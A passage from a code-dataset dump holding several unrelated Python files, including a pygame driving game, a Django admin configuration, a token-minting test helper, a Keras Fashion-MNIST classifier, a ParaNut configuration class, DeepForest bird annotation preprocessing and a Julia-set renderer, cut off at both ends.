100:\n self.spawn[self.spawn_point][1] = -200\n self.spawn_point = random.randint(0, 3)\n self.speed = random.randint(0, 4)\n ecar_x = self.spawn[self.spawn_point][0]\n ecar_y = self.spawn[self.spawn_point][1]\n def draw(self):\n global ecar_x, ecar_y\n screen.blit(self.image, self.spawn[self.spawn_point])\n\nbg_y = 0\ndef background():\n global bg_y, speed\n screen.blit(road, (0, bg_y))\n screen.blit(road, (0, bg_y - height))\n if bg_y >= height: bg_y -= height\n bg_y += speed\n\nspawn = [random.randint(20, 430), -60]\ncnt = 0\ndef draw_coin():\n global spawn, cnt\n global car_x, car_y\n screen.blit(coin, (spawn[0], spawn[1]))\n if spawn[1] > height: spawn = [random.randint(20, 430), -60]\n if car_x - 45 < spawn[0] < car_x + 90 and car_y - 45 < spawn[1] < car_y + 170:\n cnt += 1\n spawn = [random.randint(20, 430), -60]\n spawn[1] += 6\n screen.blit(cnt_coin, (10, 10))\n screen.blit(font.render(str(cnt), 1, (255, 255, 0)), (45, 5))\n\ndef crush_test():\n global ecar_x, ecar_y\n global car_x, car_y\n if ecar_x - 85 < car_x < ecar_x + 85 and car_y < ecar_y < car_y + 170:\n return True\n\ncar = Car()\nenemy_car = Enemy_car()\n\nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n exit()\n if crush_test():\n screen.blit(gameover, (0, 0))\n screen.blit(font.render('COINS : ' + str(cnt), 1, (255, 255, 0)), (150, 500))\n else:\n background()\n draw_coin()\n car.move()\n enemy_car.move()\n car.draw()\n enemy_car.draw()\n pygame.display.update()\n 
FPS.tick(60)","sub_path":"TSIS8/gta.py","file_name":"gta.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"476726008","text":"from django.contrib import admin\nfrom django.contrib.auth.models import Group\n\nfrom users.models import AuthUser, LoggedLogin\n\n\n@admin.register(AuthUser)\nclass AuthUserAdmin(admin.ModelAdmin):\n def emails_sent(self, instance):\n return instance.sentemail_set.count()\n\n def address_subscriptions(self, instance):\n return instance.addresssubscription_set.count()\n\n def forwarding_addresses(self, instance):\n return instance.addressforwarding_set.count()\n\n list_display = (\n 'id',\n 'date_joined',\n 'email',\n 'emails_sent',\n 'address_subscriptions',\n 'forwarding_addresses',\n 'first_name',\n 'last_name',\n 'is_active',\n 'is_staff',\n 'is_superuser',\n 'creation_ip',\n 'creation_user_agent',\n )\n search_fields = ['first_name', 'last_name', 'email', ]\n list_filter = ('is_active', 'is_staff', 'is_superuser', )\n\n\n@admin.register(LoggedLogin)\nclass LoggedLoginAdmin(admin.ModelAdmin):\n list_display = (\n 'id',\n 'login_at',\n 'auth_user',\n 'ip_address',\n 'user_agent',\n )\n raw_id_fields = ('auth_user', )\n search_fields = ['ip_address', 'user_agent', ]\n\n\n# unregister the Group model from admin since we're not using Django's built-in permissions\nadmin.site.unregister(Group)\n","sub_path":"users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"560320961","text":"from brownie import accounts, Contract, chain\ntry:\n from brownie import interface\nexcept:\n pass\n\nCAKE = '0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82'\nWBNB = '0xbb4cdb9cbd36b01bd1cbaebf2de08d9173bc095c'\nALPHA = '0xa1faa113cbE53436Df28FF0aEe54275c13B40975'\nBUSD = '0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56'\nBYFI = '0x88f1A5ae2A3BF98AEAF342D26B30a79438c9142e'\n\n\ndef almostEqual(a, b, thresh=0.01):\n return a <= b + thresh * abs(b) and a >= b - thresh * abs(b)\n\n\ndef mint_tokens(token, to, interface=None, amount=None):\n if interface is None:\n interface = globals()['interface']\n\n token = interface.IAny(token)\n if amount is None:\n # default is 1M tokens\n amount = 10**12 * 10**token.decimals()\n\n if token == CAKE:\n owner = token.owner()\n token.mint(to, amount, {'from': owner})\n elif token == WBNB:\n token.deposit({'from': accounts[9], 'value': amount})\n token.transfer(to, amount, {'from': accounts[9]})\n elif token == ALPHA or token == BUSD:\n owner = token.owner()\n token.mint(amount, {'from': owner})\n token.transfer(to, amount, {'from': owner})\n else:\n raise Exception('tokens not supported')\n","sub_path":"scripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"14085772","text":"import plot_correlation as pltcorr\nimport plot_dist as pdi\nimport plot_explained_variance as pev\nimport plot_pc_map as pltmap\nimport plot_dendrogram as pd\nimport plot_pc_vs_poly_all as ppp\nimport plot_linkage_check as plc\nimport numpy as np\nfrom constants import const\nimport matplotlib.pyplot as plt\n\n\nC = const()\n\nnames_cal = C['names_cal']\nset_id_cal = C['set_id_cal']\nstrt_cal = C['strt_cal']\nns_cal = C['ns_cal']\ndir_cal = C['dir_cal']\n\nnames_val = C['names_val']\nset_id_val = C['set_id_val']\nstrt_val = 
C['strt_val']\nns_val = C['ns_val']\ndir_val = C['dir_val']\n\n# \"\"\"Plot an autocorrelation\"\"\"\n# sn = 0\n# iA = 1\n# iB = 1\n# pltcorr.pltcorr(ns_cal[0], set_id_cal[0], sn, iA, iB)\n\n# \"\"\"Plot the distances between clusters\"\"\"\n# pdi.pltdist()\n\n\"\"\"Plot the percentage explained variance\"\"\"\npev.variance()\n\n\"\"\"Plot the microstructures in PC space\"\"\"\npcA = 0\npcB = 1\npltmap.pltmap(ns_cal, names_cal, set_id_cal, 'cal', pcA, pcB)\npltmap.pltmap(ns_val, names_val, set_id_val, 'val', pcA, pcB)\n\n\"\"\"Plot a dendrogram\"\"\"\npd.pltdend(ns_val, set_id_val, names_val)\n\n\"\"\"Plot the errors versus number of PCs and polynomial order\"\"\"\nppp.pltpcpoly('modulus', 15)\nppp.pltpcpoly('strength', 15)\nppp.pltpcpoly('modulus', 150)\nppp.pltpcpoly('strength', 150)\n\n\"\"\"Plot the predicted versus actual values of the property of interest\"\"\"\nn_poly = 2\nplc.plot_check(ns_val, names_val, 'val', 'modulus', n_poly)\nplc.plot_check(ns_val, names_val, 'val', 'strength', n_poly)\nplt.show()\n","sub_path":"fip_collab/2016_07_04_polycrystal_rollett/main_plt.py","file_name":"main_plt.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"212021406","text":"from simtools.Managers.WorkItemManager import WorkItemManager\nfrom simtools.SetupParser import SetupParser\nfrom simtools.AssetManager.FileList import FileList\n\nwi_name = \"SSMT Analysis\"\ncommand = \"python run_analysis.py\"\nuser_files = FileList(root='files')\n\nif __name__ == \"__main__\":\n SetupParser.default_block = 'HPC'\n SetupParser.init()\n\n wim = WorkItemManager(item_name=wi_name, command=command, user_files=user_files,\n related_experiments=[\"39953ccf-e899-e811-a2c0-c4346bcb7275\"])\n wim.execute(True)","sub_path":"examples/SSMT/generic_ssmt/run_ssmt_analysis.py","file_name":"run_ssmt_analysis.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"613916621","text":"# OneHotEncoding\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom tensorflow.keras.datasets import fashion_mnist\r\n\r\n(x_train, y_train), (x_test, y_test) = fashion_mnist.load_data()\r\n\r\nprint(x_train.shape, y_train.shape) # (60000, 28, 28) (60000,)\r\nprint(x_test.shape, y_test.shape) # (10000, 28, 28) (10000,)\r\n\r\n\r\nfrom keras.utils import np_utils\r\nfrom tensorflow.keras.utils import to_categorical\r\nfrom sklearn.preprocessing import OneHotEncoder\r\n\r\ny_train = to_categorical(y_train)\r\ny_test = to_categorical(y_test)\r\n\r\n\r\n\r\nx_train = x_train.reshape(60000,28,28,1).astype('float32')/255.\r\nx_test = x_test.reshape(10000,28,28,1).astype('float32')/255. # minmax scaler의 효과\r\n\r\n# print(x_train[0]) # 최대값은 255이다. 명암을 0 ~ 255 값으로 나타내었다.\r\n\r\n# 2. 
Model\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Dense\r\nfrom tensorflow.keras.layers import Conv2D\r\nfrom tensorflow.keras.layers import MaxPooling2D\r\nfrom tensorflow.keras.layers import Flatten\r\n\r\nmodel = Sequential()\r\nmodel.add(Conv2D(10,(2,2),padding='same',input_shape=(28,28,1))) # 28,28,60\r\nmodel.add(Conv2D(10,(2,2),padding='valid')) # 27,27,50\r\nmodel.add(Conv2D(10,(3,3))) # 25,25,40\r\nmodel.add(Conv2D(10,(2,2),strides=2)) # 12,12,30\r\nmodel.add(MaxPooling2D(pool_size=2)) # pool_size default : 2 # 6 ,6 ,30\r\nmodel.add(Flatten()) # 1080,\r\nmodel.add(Dense(10,activation='relu')) # 20,\r\nmodel.add(Dense(10,activation='softmax')) # 10,\r\nmodel.summary() \r\n\r\n# model save\r\nmodel.save(\"./save/keras50_1_save_model_1118_test01_1.h5\")\r\n\r\n\r\n# 3. Compile, train\r\n\r\n# ES\r\nfrom tensorflow.keras.callbacks import EarlyStopping\r\nes = EarlyStopping(monitor='loss',patience=5, mode='auto')\r\n\r\n# ModelCheckPoint\r\nfrom tensorflow.keras.callbacks import ModelCheckpoint\r\nmodelpath = \"./model/keras50_1_save_model_1118-{epoch:02d}-{val_loss:.4f}.hdf5\" \r\n# 02d = two-digit integer, .4f = four decimal places\r\nmcp = ModelCheckpoint(filepath=modelpath, monitor='val_loss',\r\n                      save_best_only=True, mode=\"auto\")\r\n\r\n# Compile\r\nmodel.compile(loss=\"categorical_crossentropy\", optimizer=\"adam\", metrics=[\"acc\"])\r\n\r\n# fit\r\nhist = model.fit(x_train,y_train, epochs=30,batch_size=32,verbose=1,\r\n                 validation_split=0.2,callbacks=[es,mcp])\r\n\r\n\r\nmodel.save(\"./save/keras50_1_save_model_1118_test01_2.h5\")\r\n\r\n\r\n\r\nloss = hist.history[\"loss\"]\r\nval_loss = hist.history[\"val_loss\"]\r\nacc = hist.history[\"acc\"]\r\nval_acc = hist.history[\"val_acc\"]\r\n\r\n# 4. Evaluate, predict\r\nresult = model.evaluate(x_test,y_test,batch_size=32)\r\nprint(\"loss : \\n\",result[0])\r\nprint(\"accuracy : \\n\",result[1])\r\n\r\n# predict data\r\nx_pred = x_test[0:10]\r\ny_pred = y_test[0:10]\r\n\r\n# Y_class_recovery = np.argmax(Y_class_onehot, axis=1).reshape(-1,1)\r\ny_test_predict = model.predict([x_pred])\r\nytp_recovery = np.argmax(y_test_predict,axis=1)\r\ny_real = np.argmax(y_pred,axis=1)\r\n\r\nprint(\"Predicted : \",ytp_recovery)\r\nprint(\"Actual : \",y_real)\r\n\r\n# Visualization\r\nimport matplotlib.pyplot as plt\r\nplt.figure(figsize=(10,6)) # look up what the unit is\r\nplt.subplot(2,1,1) # first of 2 rows x 1 column\r\nplt.plot(loss,marker='.',c='red',label='loss')\r\nplt.plot(val_loss,marker='.',c='blue',label='val_loss')\r\nplt.grid() # draw a grid like graph paper.\r\n\r\nplt.title('loss')\r\nplt.ylabel('loss')\r\nplt.xlabel('epoch')\r\nplt.legend(loc='upper right')\r\n\r\nplt.subplot(2,1,2) # second of 2 rows x 1 column\r\nplt.plot(acc,marker='.',c='red')\r\nplt.plot(val_acc,marker='.',c='blue')\r\nplt.grid() # draw a grid like graph paper.\r\n\r\nplt.title('accuracy')\r\nplt.ylabel('acc')\r\nplt.xlabel('epoch')\r\nplt.legend(['acc','val_acc']) # if the label position is not specified, it is placed in an empty spot automatically.\r\n\r\nplt.show()\r\n\r\n\r\n\r\n\r\n# 1500/1500 [==============================] - 3s 2ms/step - loss: 0.2664 - acc: 0.9029 - val_loss: 0.3268 - val_acc: 0.8857\r\n# 313/313 [==============================] - 1s 2ms/step - loss: 0.3460 - acc: 0.8815\r\n# loss :\r\n# 0.34601864218711853\r\n# accuracy :\r\n# 0.8815000057220459\r\n# Predicted :  [9 2 1 1 6 1 4 6 5 7]\r\n# Actual :  [9 2 1 1 6 1 4 6 5 7]\r\n","sub_path":"Study/keras/keras50_1_save_model_1118.py","file_name":"keras50_1_save_model_1118.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} 
+{"seq_id":"151164461","text":"# -----------------------------------------------------------------------------\n#\n# This file is part of the ParaNut project.\n#\n# Copyright (C) 2023 Daniel Bortkevych \n# Oleg Murashko \n# Haris Vojic \n# Hochschule Augsburg, University of Applied Sciences\n#\n# Description:\n# The configuration class for ParaNut is implemented in this file\n#\n# --------------------- LICENSE -----------------------------------------------\n# Redistribution and use in source and binary forms, with or without \n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice, \n# this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation \n# and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE \n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE \n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR \n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF \n# SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND \n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n# -----------------------------------------------------------------------------\n\n## Unit class provides methods to get and set unit attributes.\nclass Unit:\n\n\t## Writes the \"config.mk\" file.\n\t#\n\t# @param self\t\t\tThe object pointer.\n\tdef _write_unit(self, path = \".\"):\n\t\twith open(f'{path}/config.mk', \"a\") as config:\n\t\t\tfor key in self.__dict__.keys():\n\t\t\t\tattr = getattr(self, key)\n\n\t\t\t\tconfig.write('\\n'.join(attr.get('description')))\n\t\t\t\tconfig.write('\\n')\n\t\t\t\tconfig.write(str(attr.get('name')))\n\t\t\t\tconfig.write(' ?= ')\n\t\t\t\tconfig.write(str(attr.get('value')))\n\t\t\t\tconfig.write('\\n\\n')\n\t\n\tdef get_attributes(self):\n\t\treturn list(self.__dict__.keys())\n\n\t## Converts the Unit attribute variables into a list.\n\t#\n\t# @param self\t\t\tThe object pointer.\n\t# @return\t\t\t\tA list of lables.\n\tdef get_labels(self):\n\t\tlabels = list()\n\t\tfor key in self.__dict__.keys():\n\t\t\tattr = getattr(self, key)\n\t\t\tlabels.append(str(attr.get('name')))\n\t\treturn labels\n\n\t## Converts the Unit attribute values into a list. 
\n\t#\n\t# @param self\t\t\tThe object pointer.\n\t# @return \t\t\t\tA list of values.\n\tdef get_values(self):\n\t\tvalues = list()\n\t\t\n\t\tfor key in self.__dict__.keys():\n\t\t\tattr = getattr(self, key)\n\t\t\tvalues.append(str(attr.get('value')))\n\t\treturn values\n\t\t\n\t## Gets the label of the Units attribute.\n\t#\n\t# @param self\t\t\tThe object pointer.\n\t# @param attr\t\t\tAttribute of the Unit.\n\t# @return\t\t\t\tA label as string.\n\tdef get_label(self, attr: str):\n\t\tassert isinstance(attr, str), 'Wrong type'\n\t\tassert attr, 'No data'\n\n\t\tattribute = getattr(self, attr)\n\t\tlabel = str(attribute.get('name'))\n\t\t\n\t\tassert label, 'No label'\n\t\t\n\t\treturn label\n\t\t\n\t## Gets the value of the Units attribute.\n\t#\n\t# @param self\t\t\tThe object pointer.\n\t# @param attr \t\t\tAttribute of the Unit.\n\t# @return\t\t\t\tThe value as string\n\tdef get_value(self, attr: str):\n\t\tassert isinstance(attr, str), 'Wrong type'\n\t\tassert attr, 'No data'\n\n\t\tattribute = getattr(self, attr)\n\t\tvalue = str(attribute.get('value'))\n\t\t\n\t\tassert value, 'No value'\n\t\t\n\t\treturn value\n\n\t## Sets the value of the Units attribute.\n\t#\n\t# @param self\t\t\tThe object pointer.\n\t# @param attr \t\t\tAttribute of the Unit.\n\t# @param value\t\t\tThe new value as string\n\tdef set_value(self, attr: str, value: str):\n\t\tattribute = getattr(self, attr)\n\t\tattribute.update({'value': value})\n\t\t\n## The NUT class.\nclass NUT(Unit):\n\t# @param self\t\t\tThe object pointer.\n\tdef __init__(self, **kwargs):\n\t\tself.mtimer_timebase_us = kwargs.get('mtimer_timebase_us')\n\t\tself.mtimer_addr\t\t= kwargs.get('mtimer_addr')\n\t\tself.reset_addr\t\t\t= kwargs.get('reset_addr')\n\t\tself.cpu_cores_ld\t\t= kwargs.get('cpu_cores_ld')\n\t\tself.cpu_cap1_cores\t\t= kwargs.get('cpu_cap1_cores')\n\t\tself.mem_size\t\t\t= kwargs.get('mem_size')\n\t\tself.ex_int\t\t\t\t= kwargs.get('ex_int')\n\t\tself.sim_clk_speed\t\t= kwargs.get('sim_clk_speed')\n\t\tself.sim_max_periphery\t= kwargs.get('sim_max_periphery')\n\n## The EXU class.\nclass EXU(Unit):\n\t# @param self\t\t\tThe object pointer.\n\tdef __init__(self, **kwargs):\n\t\tself.m_extension\t\t= kwargs.get('m_extension')\n\t\tself.a_extension\t\t= kwargs.get('a_extension')\n\t\tself.priv_levels\t\t= kwargs.get('priv_levels')\n\t\tself.perfcount_enable\t= kwargs.get('perfcount_enable')\n\t\tself.perfcounter_bits\t= kwargs.get('perfcounter_bits')\n\t\tself.perfcounters_ld\t= kwargs.get('perfcounters_ld')\n\n## The MEMU class.\nclass MEMU(Unit):\n\t# @param self\t\t\tThe object pointer.\n\tdef __init__(self, **kwargs):\n\t\tself.cache_banks_ld\t\t= kwargs.get('cache_banks_ld')\n\t\tself.cache_sets_ld\t\t= kwargs.get('cache_sets_ld')\n\t\tself.cache_ways_ld\t\t= kwargs.get('cache_ways_ld')\n\t\tself.cache_replace_lru\t= kwargs.get('cache_replace_lru')\n\t\tself.arbiter_method\t\t= kwargs.get('arbiter_method')\n\t\tself.busif_width\t\t= kwargs.get('busif_width')\n\n## The MMU class.\nclass MMU(Unit):\n\t# @param self\t\t\tThe object pointer.\n\tdef __init__(self, **kwargs):\n\t\tself.tlb_enable\t\t\t= kwargs.get('tlb_enable')\n\t\tself.tlb_entries_ld\t\t= kwargs.get('tlb_entries_ld')\n\n## The IFU class.\nclass IFU(Unit):\n\t# @param self\t\t\tThe object pointer.\n\tdef __init__(self, **kwargs):\n\t\tself.ibuf_size_ld\t\t= kwargs.get('ibuf_size_ld')\n\n## The LSU class.\nclass LSU(Unit):\n\t# @param self\t\t\tThe object pointer.\n\tdef __init__(self, **kwargs):\n\t\tself.wbuf_size_ld\t\t= 
kwargs.get('wbuf_size_ld')\n","sub_path":"config-creator/src/paranut.py","file_name":"paranut.py","file_ext":"py","file_size_in_byte":6122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"444604449","text":"#DeepForest bird detection from extracted Zooniverse predictions\nimport comet_ml\nfrom pytorch_lightning.loggers import CometLogger\nfrom deepforest.callbacks import images_callback\nfrom deepforest import visualize\nfrom deepforest import main\nimport traceback\nimport geopandas as gp\nfrom shapely.geometry import Point, box\nimport pandas as pd\nimport rasterio\nimport os\nimport numpy as np\nimport glob\nimport torch\nfrom datetime import datetime\n\n#Define shapefile utility\ndef shapefile_to_annotations(shapefile, rgb_path, savedir=\".\"):\n    \"\"\"\n    Convert a shapefile of annotations into an annotations csv file for DeepForest training and evaluation\n    Args:\n        shapefile: Path to a shapefile on disk. If a label column is present, it will be used, else all labels are assumed to be \"Tree\"\n        rgb_path: Path to the RGB image on disk\n        savedir: Directory to save csv files\n    Returns:\n        None: a csv file is written\n    \"\"\"\n    #Read shapefile\n    gdf = gp.read_file(shapefile)\n    \n    #Drop duplicates caused by rounding errors\n    gdf = gdf.groupby(\"selected_i\").apply(lambda x: x.head(1))\n    \n    #define in image coordinates and buffer to create a box\n    gdf[\"geometry\"] =[Point(x,y) for x,y in zip(gdf.x.astype(float), gdf.y.astype(float))]\n    gdf[\"geometry\"] = [box(int(left), int(bottom), int(right), int(top)) for left, bottom, right, top in gdf.geometry.buffer(25).bounds.values]\n    \n    #extent bounds\n    df = gdf.bounds\n    \n    #Assert size maintained\n    assert df.shape[0] == gdf.shape[0]\n    \n    df = df.rename(columns={\"minx\":\"xmin\",\"miny\":\"ymin\",\"maxx\":\"xmax\",\"maxy\":\"ymax\"})\n    \n    #cut off on borders\n    try:\n        with rasterio.open(rgb_path) as src:\n            height, width = src.shape\n    except:\n        print(\"Image {} failed to open\".format(rgb_path))\n        return None\n    \n    df.ymax[df.ymax > height] = height\n    df.xmax[df.xmax > width] = width\n    df.ymin[df.ymin < 0] = 0\n    df.xmin[df.xmin < 0] = 0\n    \n    #add filename and bird labels\n    df[\"image_path\"] = os.path.basename(rgb_path)\n    df[\"label\"] = \"Bird\"\n    df[\"species\"] = gdf.species\n    \n    #enforce pixel rounding\n    df.xmin = df.xmin.astype(int)\n    df.ymin = df.ymin.astype(int)\n    df.xmax = df.xmax.astype(int)\n    df.ymax = df.ymax.astype(int)\n    \n    #select columns\n    result = df[[\"image_path\",\"xmin\",\"ymin\",\"xmax\",\"ymax\",\"label\",\"species\"]]\n    \n    result = result.drop_duplicates()\n    \n    return result\n\ndef find_rgb_path(shp_path, image_dir):\n    basename = os.path.splitext(os.path.basename(shp_path))[0]\n    rgb_path = \"{}/{}.png\".format(image_dir,basename)\n    return rgb_path\n    \ndef format_shapefiles(shp_dir,image_dir=None):\n    \"\"\"\n    Format the shapefiles from extract.py into a list of annotations compliant with DeepForest -> [image_name, xmin,ymin,xmax,ymax,label]\n    shp_dir: directory of shapefiles\n    image_dir: directory of images. 
If not specified, set as shp_dir\n    \"\"\"\n    if not image_dir:\n        image_dir = shp_dir\n        \n    shapefiles = glob.glob(os.path.join(shp_dir,\"*.shp\"))\n    \n    #Assert all are unique\n    assert len(shapefiles) == len(np.unique(shapefiles))\n    \n    annotations = [ ]\n    for shapefile in shapefiles:\n        rgb_path = find_rgb_path(shapefile, image_dir)\n        result = shapefile_to_annotations(shapefile, rgb_path)\n        #skip invalid files\n        if result is None:\n            continue\n        annotations.append(result)\n    annotations = pd.concat(annotations)\n    \n    return annotations\n\ndef split_test_train(annotations):\n    \"\"\"Split annotations into train and test by image\"\"\"\n    #Currently want to maintain the random split\n    np.random.seed(0)\n    \n    #add to train_names until reach target split threshold\n    image_names = annotations.image_path.unique()\n    target = int(annotations.shape[0] * 0.9)\n    counter = 0\n    train_names = []\n    for x in image_names:\n        if target > counter:\n            train_names.append(x)\n            counter+=annotations[annotations.image_path == x].shape[0]\n        else:\n            break\n    \n    train = annotations[annotations.image_path.isin(train_names)]\n    test = annotations[~(annotations.image_path.isin(train_names))]\n    \n    return train, test \n\ndef run(shp_dir, empty_frames_path=None, save_dir=\".\"):\n    \"\"\"Parse annotations, create a test split and train a model\"\"\"\n    annotations = format_shapefiles(shp_dir) \n\n    #Split train and test\n    train, test = split_test_train(annotations)\n    \n    #Add some empty images to train and test\n    empty_frames_df = pd.read_csv(empty_frames_path, index_col=0)\n    empty_frames_df = empty_frames_df.sample(n=10)\n    \n    #add some blank annotations\n    empty_frames_df[\"xmin\"] = pd.Series(dtype=\"Int64\")\n    empty_frames_df[\"ymin\"] = pd.Series(dtype=\"Int64\")\n    empty_frames_df[\"xmax\"] = pd.Series(dtype=\"Int64\")\n    empty_frames_df[\"ymax\"] = pd.Series(dtype=\"Int64\")\n    empty_frames_df[\"label\"] = pd.Series(dtype=str)\n    \n    empty_train, empty_test = split_test_train(empty_frames_df)\n    \n    #limit the number of empty\n    #train = pd.concat([train, empty_train])\n    #test = pd.concat([test, empty_test])\n    \n    #Enforce rounding to pixels, pandas \"Int64\" dtype for nullable arrays https://pandas.pydata.org/pandas-docs/stable/user_guide/integer_na.html\n    train.xmin = train.xmin.astype(\"Int64\")\n    train.ymin = train.ymin.astype(\"Int64\")\n    train.xmax = train.xmax.astype(\"Int64\")\n    train.ymax = train.ymax.astype(\"Int64\")\n    \n    test.xmin = test.xmin.astype(\"Int64\")\n    test.ymin = test.ymin.astype(\"Int64\")\n    test.xmax = test.xmax.astype(\"Int64\")\n    test.ymax = test.ymax.astype(\"Int64\")\n    \n    #write paths to headerless files alongside data, add a separate test empty file\n    train_path = \"{}/train.csv\".format(shp_dir)\n    test_path = \"{}/test.csv\".format(shp_dir)\n    empty_test_path = \"{}/empty_test.csv\".format(shp_dir)\n    \n    train.to_csv(train_path, index=False)\n    test.to_csv(test_path, index=False)\n    empty_test.to_csv(empty_test_path, index=False)\n    \nif __name__ == \"__main__\":\n    run(\n        shp_dir=\"/orange/ewhite/everglades/Zooniverse/parsed_images/\",\n        empty_frames_path=\"/orange/ewhite/everglades/Zooniverse/parsed_images/empty_frames.csv\",\n        save_dir=\"/orange/ewhite/everglades/Zooniverse/predictions/\"\n    )","sub_path":"Zooniverse/create_model.py","file_name":"create_model.py","file_ext":"py","file_size_in_byte":6293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"190224510","text":"#Mandelbrot Code\nimport math, pygame, time\n\n#Z(n+1) = Z(n)^2 + C\n\ndef createColorPallet(limit_num):\n    #Creates a 
color palette using the iteration limit\n    color_list = []\n    for i in range(limit_num):\n        color_list.append((0, ((255 * (i + 1))/limit_num), 0))\n\n    return color_list\n\n\ndef squareImaginaryNum(real, imaginary):\n    realpart = (real ** 2) - (imaginary ** 2)\n    imaginarypart = 2 * real * imaginary\n\n    return [realpart, imaginarypart]\n\ndef checkForDivergence(real, imaginary, constant_real, constant_imag, stop):\n    temp_real = real\n    temp_imag = imaginary\n    times = 0\n    while math.sqrt(temp_real ** 2 + temp_imag ** 2) <= 2 and times < stop:\n        num = squareImaginaryNum(temp_real, temp_imag)\n        temp_real = num[0] + constant_real\n        temp_imag = num[1] + constant_imag\n        times = times + 1\n    return times\n\ndef findPoints(c_r, c_i, limit):\n\n    con_div_list = []\n\n    colors = createColorPallet(limit)\n\n    for i in range(-400, 400):\n        temp_list = []\n        for j in range(-400, 400):\n            temp_list.append(checkForDivergence(i/200, j/200, c_r, c_i, limit))\n        con_div_list.append(temp_list)\n\n    return con_div_list\n\ndef drawSet(set_list):\n    for i in range(len(set_list)):\n        for j in range(len(set_list[i])):\n            screen.set_at((i, j), colors[set_list[i][j] - 1])\n\n    pygame.display.update()\n\nlimit = 20\nc_real = float(input(\"cr\"))\nnum = int(input(\"num\"))\n\nlist_of_sets = []\ncolors = createColorPallet(limit)\n#The constants in the \"findPoints\" function can be changed to change the fractals\n#displayed.\n\nfor i in range(num):\n    list_of_sets.append(findPoints(c_real, (i - ((num - 1)/2))/ ((num - 1)/2), limit))\n    print(\"Done with \" + str((i + 1)) + \" out of \" + str(num) + \"! Please be patient!\")\n\npygame.init()\n\nwidth = 800\nheight = 800\nscreen = pygame.display.set_mode((width, height))\n\nfor i in range(len(list_of_sets)):\n    drawSet(list_of_sets[i])\n    pygame.image.save(screen, \"julia_cr\" + str(c_real) + \"_cineg1to1_by0,01\" + str(i + 1) + \"of\" + str(len(list_of_sets)) + \".jpg\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"CS2/1500_mandelbrot_fractal/1200_mandelbrot_fractal/cal_boye_lynns_julia_set/juliasetsio03(201f).py","file_name":"juliasetsio03(201f).py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"101479379","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import (absolute_import, division,\n                        print_function, unicode_literals)\nimport os\nimport shutil\nimport re\nimport numpy as np\nimport pandas as pd\nfrom scipy.constants import physical_constants\n\n\nclass KGRNCreator(object):\n    def __init__(self, xc, kmesh, structure, mag, volume, temperature):\n        self._xc = xc\n        self._kmesh = kmesh\n        self._structure = structure\n        self._mag = mag\n        self._volume = volume\n        self._temperature = temperature\n        self._create_spin_type()\n        self._create_iex()\n        self._create_structure_parameters()\n        self._create_zmsh()\n        self._create_rws()\n        self._create_directory_name()\n\n    def run(self):\n        self.check_file_existance()\n        self.create_inp_kgrn()\n        self.arrange_files()\n\n    @staticmethod\n    def check_file_existance():\n        \"\"\"check if all input files are available\"\"\"\n        input_files = ['inp_kgrn', 'inp_kfcd']\n        if not all([(_ in os.listdir('.')) for _ in input_files]):\n            raise FileNotFoundError\n\n    @staticmethod\n    def print_warning_Ti_Zr_Hf():\n        \"\"\"warning for Ti and Zr\"\"\"\n        red = '\\033[31m'\n        # end = '\\033[0m'\n        print(red + \"WARNING: for Ti and Zr we have found problems in \"\n                    \"reproducing planewave aLats\")\n        print(red + \"         this is probably related to the semi-core \"\n                    \"electrons, but including them did not 
